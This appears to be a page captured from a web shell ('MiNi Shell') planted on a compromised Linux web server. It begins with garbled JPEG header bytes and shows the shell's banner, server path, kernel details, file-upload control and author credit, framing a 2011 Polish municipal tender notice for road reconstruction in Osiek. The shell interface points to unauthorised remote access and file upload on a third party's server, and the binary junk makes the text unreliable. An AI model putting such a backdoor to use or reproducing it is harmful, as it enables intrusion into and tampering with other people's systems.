JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110211/20844-N-2011.html

<p class="kh_header"><b>Osiek: Odbudowa i remont ciągu komunikacyjnego dogi gminnej
  ulica. Grabowiec Południowy z ulicą  M.B. Sulisławskiej</b><br>
<b>Numer ogłoszenia: 20844 - 2011; data zamieszczenia: 11.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Osiek , ul. Rynek 1, 28-221 Osiek, woj. świętokrzyskie, tel. 015 8671203, faks 015 8671232.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.osiek.iap.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbudowa i remont ciągu komunikacyjnego dogi gminnej
  ulica. Grabowiec Południowy z ulicą  M.B. Sulisławskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane związane z przebudową i remontem ciągu komunikacyjnego drogi gminnej ul. Grabowiec Południowy z ul. M. B. Sulisławskiej.
Zamówienia  obejmuje:

Wykonanie :
                 
1.	Roboty przygotowawcze CPV 451112200-0,
- Wyznaczanie trasy drogi oraz punktów wysokościowych,
- Ścinanie drzew piłą mechaniczną (śr. 66-90cm)
- Mechaniczne karczowanie krzaków
- Rozebranie obrzeży trawnikowych  o wymiarach 6x20 cm na podsypce piaskowej
- Mechaniczna rozbiórka krawężników betonowych 15x30cm
- Frezowanie wyrównawcze nawierzchni bitumicznej o śr. grubości 3 cm
- Rozebranie chodników z płyt betonowych 50x50x7 cm na podsypce piaskowej
- Mechaniczna rozbiórka nawierzchni zjazdów,
- Wykonanie przepustów rurą dwudzielną arot A110 (lub równoważną) pod drogami i innymi przeszkodami wykopem otwartym w gruncie kat IV,
  
2.	Roboty ziemne CPV 45111200-0,
- Usunięcie ziemi urodzajnej (humusu) o grubości do 15 cm
- Wykopy jamiste wykonane koparkami podsiębiernymi 0.40m3 na odkład w gruncie
    kat. III
- Roboty ziemne wykonane dla zabezpieczenia przewodu tp  przed przejazdem         kolejowym
- Wykonanie nasypu z gruntu dowiezionego z dokopu na uzupełnienia na poboczach oraz na odcinku zatok postojowych

3.	Odwodnienie CPV 45232400-6
- Wymiana przelotowej części przepustu  pod drogą fi 60 wraz z rozebraniem 
i odtworzeniem istniejącej konstrukcji nawierzchni
-  Wykonanie wpustów krawężnikowych kanalizacji deszczowej  kl. C-250 bez osadnika i syfonu wraz z podłączeniem do istniejących studzienek
- Remont część przelotowych przepustów pod drogą o średnicy 50 cm wraz 
z rozebraniem z rozebraniem istniejącego przepustu
- Remont części przelotowych przepustów  o średnicy 50 cm  pod zjazdami 
i skrzyżowaniami wraz z rozebraniem z rozebraniem istniejącego przepustu
- Przepusty rurowe pod zjazdami - ścianki czołowe dla rury o śr. 50 cm
- Wykonanie remontu wlotów (wylotów) prefabrykowanych przepustów drogowych rurowych z betonu C 20/25 dla przepustów fi 150
-   Wykonanie odbudowy wlotów (wylotów) prefabrykowanych przepustów drogowych rurowych z betonu C 20/25 dla przepustów fi 60
- Wykonanie odmulenia istniejących rowów z wyprofilowaniem  dna i skarp oraz oczyszczeniem przepustów pod zjazdami,
- Mechaniczne czyszczenie studzienek ściekowych i przykanalików.
  
4.	Podbudowy CPV 45 233220-7
- Wykonanie koryta na zatoce postojowej  od km 0+556 do km 0+678 głębokość koryta do 40 cm wraz zagęszczeniem,
- Wykonanie warstwy podsypki  piaskowej wraz z wykonaniem koryta pod chodniki  - grubość warstwy po zag. 10 cm
- Podbudowa z piasku stabilizowanego  cementem gr. 15 cm po zagęszczeniu,
- Wykonanie i zagęszczenie mechaniczne warstwy odsączającej z piasku  gr. 15 cm,
- Wykonanie podbudowy z kruszywa łamanego 0-31/5 mm gr. 15 cm po zagęszczeniu na zjazdach o nawierzchni z kostki  i B/A,
- Wykonanie podbudowy z tłucznia kamiennego  dwie warstwy dolna 17 cm i górna 8 cm.,
- Wykonanie podbudowy  pod chodniki z kruszywa łamanego 0-16 gr. 10 cm,
- Wykonanie podbudowy z kruszywa łamanego stabilizowanego  mechanicznie  0-63 mm gr. 20 cm. po zagęszczeniu,
- wyrównanie istniejącej nawierzchni mieszanka kruszywa łamanego  (0-31/5mm) średnia grubość 5 cm.
           
5.	Nawierzchnie CPV 45233220-7
- Wykonanie warstwy ścieralnej nawierzchni z B/A (0-12,8mm) gr. 4 cm 
po zagęszczeniu,
- Wyrównanie i profilowanie istniejącej nawierzchni mieszanką MMA wg tabeli wyrównanie + uzupełnienie przy krawężniku,
-  Wykonanie nawierzchni tłuczniowej  (0-31,5mm) gr. 15 cm na zjazdach  o nawierzchni tłuczniowej 

6.	Roboty wykończeniowe CPV 451233200-1
- Ręczna plantowanie powierzchni  gruntu za chodnikiem,
- Uzupełnienie poboczy mieszanką kamienia łamanego  0 -31,5 mm na szer. według tabeli gr. 8 cm. wraz z zagęszczeniem,
- Regulacja pionowa studzienek dla włazów kanałowych ks i Kd bez wymiany pokryw
- Regulacja pionowa studzienek dla włazów kanałowych ks i Kd z wymiana pokryw  na D-400 kN
- Regulacja pionowa studzienek dla kratek sciekowych  ulicznych wraz z wymianą wpustów C-250kN
-  Regulacja pionowa studzienek dla zaworów wodociągowych,
- Umocnienie skarp i dna rowów płytami betonowymi chodnikowymi o wym. 50x50x7 cm na podsypce cementowo - piaskowej na odpływie do przepustu odc. 3 - płyty 
z rozbiórki chodnika

7.	Ustawienie i wykonanie elementów bezpieczeństwa CPV 45233290-8
- Ustawienie  nowych znaków drogowych wraz ze słupkami,
- Poręcze ochronne U-12 sztywne z pochwytem i przeciągiem z rur śr. 60 i 38 mm 
o rozstawie słupków z rur 60 mm 1,5m - na przepuście,
- Ręczne malowanie linii na skrzyżowaniach  i przejściach  dla pieszych  farbą chlorokauczukową - malowanie grubowarstwowe przejść dla pieszych  
           
8.	Elementy ulic CPV 45233220-7
- Ustawienie krawężników betonowych o wymiarach 13x30 cm na podsypce piaskowej na ławie betonowej z oporem  obmiar wg. tabeli
- Wykonanie nawierzchni chodników z kostki brukowej  betonowej grubości 6 cm na podsypce cementowo - piaskowej,
-  Nawierzchnie z kostki brukowej betonowej grubości 8 cm na podsypce cementowo - piaskowej układane na zjazdach z kostki obmiar wg. tabeli
- Ustawienie obrzeży betonowych o wymiarach  20x6 cm na podsypce  cementowo - piaskowej z wypełnieniem spoin piaskiem, obmi8ar wg tabeli   

   
Ponadto wykonawca należycie zabezpieczy teren prac na okres ich trwania oraz dokona stosownego oznakowania drogi. 

Szczegółowy zakres  robót precyzuje przedmiar robót stanowiący  załącznik do niniejszej specyfikacji. zał. Nr 3 oraz Szczegółowa Specyfikacja Techniczna zał. Nr 9.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta winna być zabezpieczona wadium w wysokości: 25 000,00 złotych. słownie:  dwadzieścia pięć tyysięcy złotych 00/100.  
2.	Wadium może być wniesione w formie przewidzianej ustawą Prawo zamówień      publicznych art. 45 ust. 6
3.	W przypadku wnoszenia wadium w formie pieniężnej, kwota oznaczona w punkcie 1 może zostać przelana na konto Zamawiającego
Nadwiślański Bank Spółdzielczy w Solcu Zdroju Oddział Osiek
Nr  34 8517 0007 0070 0000 0303 0006
4.	W przypadku przelewu oferent dołączy do oferty kopię polecenia przelewu, lecz nie w tej samej kopercie. Wadium wpłacone w formie gotówki lub wniesione przelewem ma być na koncie Zamawiającego do dnia 28. 02. 2011r. do godz. 10:00. 
5.	W przypadku wnoszenia wadium w innej formie, należy je złożyć w pokoju  103 
w  siedzibie Zamawiającego do dnia  28.02.2011r. do godz. 10:00. 
6.	Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnienia postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 4 a ustawy Pzp. Zamawiający zwraca wadium zgodnie z  art. 46 ust 1, 1a, 2,3,,4  ustawy Pzp   
7.	Zamawiający zatrzymuje wadium wraz z odsetkami zgodnie z art. 46 ust 4a i.5, jeżeli Wykonawca którego oferta została wybrana:  odmówi podpisania umowy lub odmówi     wniesienia zabezpieczenia należytego wykonania umowy, zawarcie umowy stało się     niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej , posiadające posiadanie uprawnień do występowania w obrocie prawnym w zakresie obejmującym przedmiot zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz robót z ostatnich 5 lat, a jeżeli okres działalności jest krótszy  -  w tym okresie, 
 - minimum  3 robót budowlanych drogowych o wartości 500 000,00 zł. brutto każda</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.	Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami ich kwalifikacji zawodowych, doświadczenia  i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją 
o podstawie do dysponowania tymi osobami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>6.	Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Prawidłowo wypełniony Formularz ofertowy stanowiącym załącznik nr 1 do niniejszej  SIWZ.
2.	Prawidłowo wypełnione oświadczenie o spełnianiu warunków określonych w art. 22 ust.1 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 r. 
3.	Prawidłowo wypełniony kosztorys ofertowy.
4.	Zaakceptowany projekt umowy (załącznik nr  3   do SIWZ).
5.	Dowód wniesienia wadium.
6.	Oryginał pełnomocnictwa do złożenia oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wprowadzenie zmian w treści umowy wymaga sporządzenia pod rygorem niważności         pisemnego aneksu. Potrzeba przeprowadzenia zmian w umowie może wynikać z następujących okoliczności:

a) zmian regulacji prawnych obowiązujących w dniu podpisania umowy (m.in. zmian   stawki podatku VAT)
b) gdy z przyczyn organizacyjnych konieczna będzie zmiana osób upoważnionych do dokonywania czynności lub zmiana danych teleadresowych określonych w niniejszej umowie,
c)  zmiany przez Wykonawcę formy wniesienia zabezpieczenia należytego wykonania umowy,
d) gdy zmianie ulegnie numer konta bankowego Wykonawcy,
e) zakres rzeczowy określony w załączniku nr 2 do niniejszej umowy ulegnie zmniejszeniu z przyczyn niezależnych od Zamawiającego lub innych uzasadnionych okoliczności,
f) w sytuacji wyrażenia przez Zamawiającego zgody na przedłużenie terminu   wykonania zamówienia na skutek zaistnienia okoliczności niezawinionych przez Wykonawcę,
g) Strony mogą zmienić postanowienia zawartej umowy, jeżeli:
    pomimo wystąpienia Wykonawcy o wydanie decyzji administracyjnej lub warunków    technicznych lub innego dokumentu niezbędnego do prawidłowej realizacji przedmiotu umowy, w terminie 14 dni od daty wystąpienia organ administracji publicznej lub inna instytucja nie wydała stosownego dokumentu,
h) wystąpią nieprzewidziane warunki realizacji, tj. warunki gruntowo - wodne będą inne niż w dokumentacji technicznej, gdy nastąpi odkrycie  nie zinwentaryzowanych  obiektów i elementów  instalacji podziemnej, gdy wystąpią warunki atmosferyczne uniemożliwiające kontynuacje robót  zgodnie z przyjęta technologią.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.osiek.iap.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Osieku
28-221 Osiek
ul. Rynek 1, pok 103.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2011 godzina 10:00, miejsce: Urząd Miasta i Gminy w Osieku
28-221 Osiek
ul. Rynek 1, pok 103.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com